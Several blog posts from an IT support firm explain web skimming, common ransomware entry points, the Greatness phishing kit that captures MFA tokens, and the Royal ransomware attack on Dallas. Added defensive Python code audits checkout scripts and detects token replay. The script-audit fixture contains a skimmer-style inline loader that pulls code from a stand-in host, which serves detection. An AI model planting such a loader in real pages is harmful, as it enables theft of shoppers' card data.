What is Web Skimming?

Back to Basics

Web skimming gets its name from the physical card skimmers criminals use in some physical retail stores to steal credit card information. Web skimming has a similar goal: stealing personally identifiable information (PII) and credit card information for criminals to use. In web skimming, also known as digital skimming, criminals insert malicious JavaScript code into compromised retail websites to record information during the online checkout process. The skimming software can live on retail pages for months without the business being aware because it does not shut down systems or lock up information the way some malware does. Additionally, criminals are getting better at hiding the skimmers and making them look like third-party services to prevent web security updates from detecting them.

Recently, WordPress and Shopify were exploited by sophisticated web skimmers that looked like Google Tag Manager and Facebook Pixel services to conceal the malicious code and keep the skimmers running longer. Criminals track vulnerabilities in legitimate e-commerce websites and look for opportunities to insert malicious code into the checkout pages. Typically these vulnerabilities come from missing security updates and from plugins. Once a vulnerability is known, criminals can search the web for businesses that are not keeping up with security updates and use the published vulnerabilities to compromise the site.

These high-level skimmers used JavaScript to load the full attack code, so the complete code was not hosted on the victim’s website. Additionally, the code would only steal an individual user’s information once to reduce the chance of detection. The criminals behind this latest attack targeted e-commerce hosting sites so that those sites would distribute the malicious code to their customers, further spreading the skimmers for the hackers. Consumers should be aware of the advancement in sophisticated skimmers and be mindful of which credit cards they use on e-commerce sites.
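Because these skimmers pose as familiar third-party tags and pull their real code from elsewhere, a site owner can compare every script on the checkout page against a reviewed baseline. The following is an added example, not code from the original post; the shop hostname, the approved lists and the sample markup are constructed assumptions.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumptions: hosts and the one inline snippet this hypothetical shop has reviewed and approved.
APPROVED_HOSTS = {"shop.example", "www.googletagmanager.com", "connect.facebook.net"}
APPROVED_INLINE = {hashlib.sha256(b"window.dataLayer = window.dataLayer || [];").hexdigest()}

class ScriptCollector(HTMLParser):
    """Records every <script>: external ones by src, inline ones by body."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._open = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            self._open = not src  # only inline scripts have a body to record
            (self.external if src else self.inline).append(src or "")

    def handle_data(self, data):
        if self._open:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._open = False

def audit_scripts(html, page_host="shop.example"):
    """Return (kind, detail) findings for scripts outside the approved baseline."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname or page_host  # relative URL: same origin
        if host not in APPROVED_HOSTS:  # exact match, so look-alike names fail
            findings.append(("unapproved-host", host))
    for body in collector.inline:
        digest = hashlib.sha256(body.strip().encode()).hexdigest()
        if digest not in APPROVED_INLINE:
            findings.append(("unapproved-inline", digest[:12]))
    return findings

# Constructed sample checkout markup: three approved scripts, one look-alike host, one unknown inline loader.
SAMPLE = """<script src="/js/cart.js"></script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://googletagmanager.analytics-cdn.example/gtm.js"></script>
<script>var s=document.createElement("script");s.src="//pixel-cdn.example/p.js";document.head.appendChild(s);</script>"""
```

Running `audit_scripts(SAMPLE)` reports the look-alike host and the unreviewed inline loader while passing the genuine tag manager script. The same baseline can be enforced in the browser with a Content-Security-Policy `script-src` directive.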

Quanexus IT Support Services for Dayton and Cincinnati

Request your free network assessment today. There is no hassle or obligation.

If you would like more information, contact us here or call 937.885.7272.

Follow us on Facebook, Twitter and LinkedIn, and stay up to date by subscribing to our email list.

Posted by Charles Wright in Back to Basics, Cybersecurity, Recent Posts

Most Common Attack Vectors

Ransomware attacks have become a more significant concern for small and medium-sized businesses (SMBs) in the US. With the addition of ransomware as a service (RaaS) and its harmful possibilities, businesses should be aware of the most common attack vectors and how they are compromised. Data shows ransomware attacks leveled off in 2022 but are on the rise again in 2023 as attack vectors continue to evolve and criminals adopt more automated tactics.

The attack vector exploited most often in ransomware attacks is a public-facing application that can be compromised. Criminals discover a critical flaw in an enterprise-level piece of software and are able to access a business network and steal data. Businesses can defend against this attack vector by regularly patching and updating systems on a recommended schedule and when manufacturers publish critical updates. Many of the large ransomware attacks that make the news and affect thousands of users can be traced back to a known critical patch that the business did not apply.

The use of compromised credentials is the next most often exploited vulnerability. Phishing can compromise credentials, but the more common issues are leaked or bought breached data and password re-use. Criminals can buy passwords from other data breaches, and if your employees re-use passwords on numerous services, the criminals may have access to business credentials even if your data was not stolen. Multi-factor authentication (MFA) and passwordless logins that use systems like passkeys can both help to fight against compromised credentials. MFA is the easiest short-term solution and can be enabled on most enterprise-level systems.

Malicious email attacks still retain third place in the most common attack vectors; even with employee training and sophisticated email filtering, malicious emails are still getting through and still being clicked on. Employees should be aware of the common attack vectors and understand phishing attacks are becoming more sophisticated and targeted to individual users.

Posted by Charles Wright in Back to Basics, Cybersecurity, Small Business

New PaaS Targets Microsoft 365

A new phishing as a service (PaaS) platform is being used to create convincing Microsoft 365 login prompts and compromise multi-factor authentication (MFA) at a low cost. The new platform, named Greatness, can create convincing Microsoft 365 cloud login screens that include the company logo and background image, and will even pre-fill the victim’s email address into the username field to look more realistic. The PaaS platform is mainly used to target manufacturing, healthcare, and technology companies but has also been reportedly used on education, construction, and financial businesses. The hacking service has primarily targeted business users in the US, UK, Australia, South Africa, and Canada since mid-2022.

The platform Greatness also goes a step further and can capture and use multi-factor authentication codes for Microsoft. When the user enters their credentials into the phishing site, the service communicates with Microsoft to prompt for MFA authentication. The hacking service then passes the authentication back to Microsoft in real time and captures the authentication token to be used again later by the attacker. This new hacking service is set up so that even unskilled attackers can use the most advanced features like compromising MFA, and records the stolen credentials and authentication token in an easy-to-use format.
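Since the captured token is used again later by the attacker, one defensive heuristic is to look for a session token presented from a different IP address than the one that completed MFA. The following is an added example, not code from the original post; the log format, field names, users and addresses are constructed assumptions and not a real Microsoft log schema.

```python
from datetime import datetime

# Constructed sign-in events in a hypothetical key=value format.
SAMPLE_LOG = """\
2023-05-10T14:02:11Z user=alice@corp.example session=s-1001 event=mfa_success ip=198.51.100.7
2023-05-10T14:02:40Z user=alice@corp.example session=s-1001 event=token_use ip=198.51.100.7
2023-05-10T14:05:03Z user=bob@corp.example session=s-1002 event=mfa_success ip=203.0.113.50
2023-05-10T19:44:29Z user=bob@corp.example session=s-1002 event=token_use ip=192.0.2.77
2023-05-10T19:45:02Z user=bob@corp.example session=s-1002 event=token_use ip=192.0.2.77
"""

def parse_event(line):
    """Split 'timestamp key=value ...' into a dict with a parsed 'ts'."""
    ts, *pairs = line.split()
    event = dict(pair.split("=", 1) for pair in pairs)
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event

def find_token_replay(log_text):
    """Flag sessions whose token is presented from an IP other than the one that passed MFA."""
    issued = {}  # session -> event that completed MFA
    alerts = {}  # (session, ip) -> alert, so each replay source is reported once
    for line in filter(str.strip, log_text.splitlines()):
        ev = parse_event(line)
        if ev["event"] == "mfa_success":
            issued[ev["session"]] = ev
        elif ev["event"] == "token_use":
            origin = issued.get(ev["session"])
            if origin is None:
                continue  # no MFA record for this session in the log window
            if ev["ip"] != origin["ip"]:
                alerts.setdefault((ev["session"], ev["ip"]), {
                    "user": ev["user"],
                    "session": ev["session"],
                    "mfa_ip": origin["ip"],
                    "replay_ip": ev["ip"],
                    "delay_seconds": int((ev["ts"] - origin["ts"]).total_seconds()),
                })
    return list(alerts.values())
```

Legitimate IP changes such as VPN or mobile network switches also trip this check, so treat a hit as a lead to investigate, not proof of compromise.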

Phishing as a service platforms have become more sophisticated over the past year, and many of them include professional toolkits that track compromised credentials and offer customer support. The cost and technical ability required have also been reduced. Not long ago, attackers needed a moderate level of programming knowledge to use the PaaS tools, but this is no longer the case. The tools have been made very user-friendly, and at a cost between $40 – $1000, anyone can launch a phishing campaign. This ease of access presents logistical problems for competing businesses or former employees.

Posted by Charles Wright in Cybersecurity, Information Security, Small Business

City of Dallas Ransomware

A ransomware attack on the city of Dallas, Texas, has negatively impacted city utilities and slowed emergency service response time. The city suffered a ransomware attack attributed to the hacker group Royal on Monday, May 1st. Network printers on the city’s network began printing ransom notes Monday morning with instructions on how to contact the hacker group.

The attack forced the city government to shut down IT systems to contain and mitigate the ransomware. Police and fire employees received an urgent message to unplug the computers in their emergency vehicles. Among the systems taken offline were 911 dispatcher computers, which has forced emergency call centers to revert to pencil and paper for recording call details and to radio for communication with emergency services. The Dallas Fire Fighters Association president said the first responders have received little guidance from city leadership. In the ninth-largest city in the United States, 911 calls are being missed because radio traffic is so busy. Emergency responders are not getting the follow-up information they are used to receiving from dispatch via computers.

Additionally, courts were closed Monday, utility bills could not be processed, and a handful of other non-emergency services were offline for a week. The city said they would add devices and services back to the network individually when it was safe to do so.

US cybersecurity agency CISA sounded the alarm on Royal as a ransomware group gaining power in early March. CISA said the group specifically targets critical infrastructure sectors, including communications, education, and healthcare. First observed in 2022, the ransomware gang typically gains access through phishing links and exfiltrates large amounts of data before notifying the victim.

Ransomware groups are shifting their tactics to data extortion. Hackers had to find a new way to make money when governments and law enforcement started breaking encryptions. Recent threats, including the printout from Royal, include threats to release or sell personal customer data.

Posted by Charles Wright in Cybersecurity, Recent Posts, Small Business